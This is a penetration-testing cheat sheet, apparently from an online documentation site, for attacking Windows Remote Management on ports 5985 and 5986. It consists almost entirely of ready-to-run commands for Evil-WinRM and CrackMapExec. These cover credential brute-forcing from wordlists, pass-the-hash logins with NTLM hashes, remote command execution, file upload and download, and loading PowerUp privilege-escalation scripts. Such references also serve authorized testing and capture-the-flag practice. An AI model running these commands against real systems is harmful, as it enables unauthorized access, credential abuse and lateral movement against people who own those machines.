> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 5985 - WinRM

> WinRM enumeration and exploitation: Evil-WinRM, PowerShell remoting, and pass-the-hash.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 5985,5986 TARGET
```

| Port | Protocol      |
| ---- | ------------- |
| 5985 | HTTP (WinRM)  |
| 5986 | HTTPS (WinRM) |

***

## Evil-WinRM

```bash theme={"dark"}
evil-winrm -i TARGET -u user -p 'password'
evil-winrm -i TARGET -u user -H NTLM_HASH
```

### With SSL

```bash theme={"dark"}
evil-winrm -i TARGET -u user -p 'password' -S
```

### Upload / Download

```bash theme={"dark"}
*Evil-WinRM* PS> upload /local/path/file.exe C:\Windows\Temp\file.exe
*Evil-WinRM* PS> download C:\Users\admin\Desktop\flag.txt /tmp/flag.txt
```

### Load PowerShell Scripts

```bash theme={"dark"}
evil-winrm -i TARGET -u user -p 'password' -s /opt/scripts/
*Evil-WinRM* PS> PowerUp.ps1
*Evil-WinRM* PS> Invoke-AllChecks
```

***

## CrackMapExec

```bash theme={"dark"}
crackmapexec winrm TARGET -u user -p password
crackmapexec winrm TARGET -u user -H NTLM_HASH
crackmapexec winrm TARGET -u user -p password -x "whoami"
crackmapexec winrm TARGET -u user -p password -X "Get-Process"
```

| Flag | Description        |
| ---- | ------------------ |
| `-x` | CMD command        |
| `-X` | PowerShell command |

***

## PowerShell Remoting (From Windows)

```powershell theme={"dark"}
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred
```

### Execute Command

```powershell theme={"dark"}
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }
```

***

## Brute-Force

```bash theme={"dark"}
crackmapexec winrm TARGET -u users.txt -p passwords.txt
```

***

## Pass-the-Hash

```bash theme={"dark"}
# -H takes ONLY the 32-char NT hash (no LM half, no colon)
evil-winrm -i TARGET -u Administrator -H NTLM_HASH
```

***

## Quick Reference

| Check       | Command                                                 |
| ----------- | ------------------------------------------------------- |
| Login       | `evil-winrm -i TARGET -u user -p pass`                  |
| PtH         | `evil-winrm -i TARGET -u user -H HASH`                  |
| Exec CMD    | `crackmapexec winrm TARGET -u user -p pass -x "whoami"` |
| Brute-force | `crackmapexec winrm TARGET -u users.txt -p pass.txt`    |
